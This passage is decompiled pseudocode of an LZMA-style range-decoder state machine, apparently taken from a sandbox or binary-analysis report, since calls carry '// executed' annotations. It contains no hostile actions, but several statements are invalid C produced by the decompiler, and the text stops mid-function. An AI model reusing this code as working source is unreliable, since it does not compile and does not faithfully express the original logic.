				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004074A1))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4)); // executed
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
